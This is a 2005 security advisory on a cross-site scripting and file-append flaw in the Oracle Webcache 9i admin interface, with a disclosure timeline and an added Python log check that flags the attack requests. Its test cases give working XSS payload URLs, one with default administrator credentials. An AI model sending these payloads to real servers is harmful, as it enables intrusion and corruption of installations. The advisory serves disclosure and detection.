Append file in Oracle Webcache 9i

Name: Append file in Oracle Webcache 9i
Systems Affected: Oracle Application Server with Webcache 9i
Severity: Low Risk
Category: Cross Site Scripting
Vendor URL: http://www.oracle.com/
Author: Alexander Kornbrust (ak at red-database-security.com)
Date: 11 May 2005 (V 1.02)
CAN-Number: CAN-2005-1381


Details
Many parameters are vulnerable to XSS/CSS (cross-site scripting) attacks. Combined with this bug, it is possible to corrupt an Oracle Application Server installation.

Patch Information
Oracle fixed this issue with informing me or their customers.

Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&
cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>

http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&
PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2

http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&
ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>
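
Requests of this shape can be found in proxy or access logs. The following is an added example, not part of the original advisory: a Python check that flags webcacheadmin requests whose file-path parameters carry markup characters or that embed credentials in the URL. The function name review_request, the character set treated as markup and the sample URLs (modelled on the test cases above) are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named in the advisory's test cases; both are expected to hold a file path.
PATH_PARAMS = {"cache_dump_file", "PartialPageErrorPage"}
# Assumption: these characters never belong in a legitimate file path value.
MARKUP = re.compile(r"[<>\"']")

def review_request(url):
    """Return a list of findings for one requested URL (empty list = nothing flagged)."""
    parts = urlsplit(url)
    if not parts.path.rstrip("/").endswith("/webcacheadmin"):
        return []
    findings = []
    if parts.username is not None:
        findings.append("credentials embedded in URL")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding (%253C -> <).
        value = unquote(value)
        if name in PATH_PARAMS and MARKUP.search(value):
            findings.append(f"markup in path parameter {name}")
        elif "<script" in value.lower():
            findings.append(f"script tag in parameter {name}")
    return findings

# Constructed sample input, modelled on the advisory's test cases plus one benign request.
SAMPLE = [
    "http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&"
    "PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2",
    "http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&"
    "ACTION=Submit&index=1&cache_dump_file=/tmp/a.txt%253Cscript%253E",
    "http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&"
    "cache_dump_file=/tmp/dump.txt",
]

if __name__ == "__main__":
    for url in SAMPLE:
        print(review_request(url) or "clean", "<-", url[:60])
```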


History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added




2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Webcache


Oracle Webcache is part of the Oracle Application Server (also known as OAS or IAS).

The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache should be your first point for accepting user requests from clients using web browsers.

The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This provides protection when some of the servers are overloaded or become inaccessible.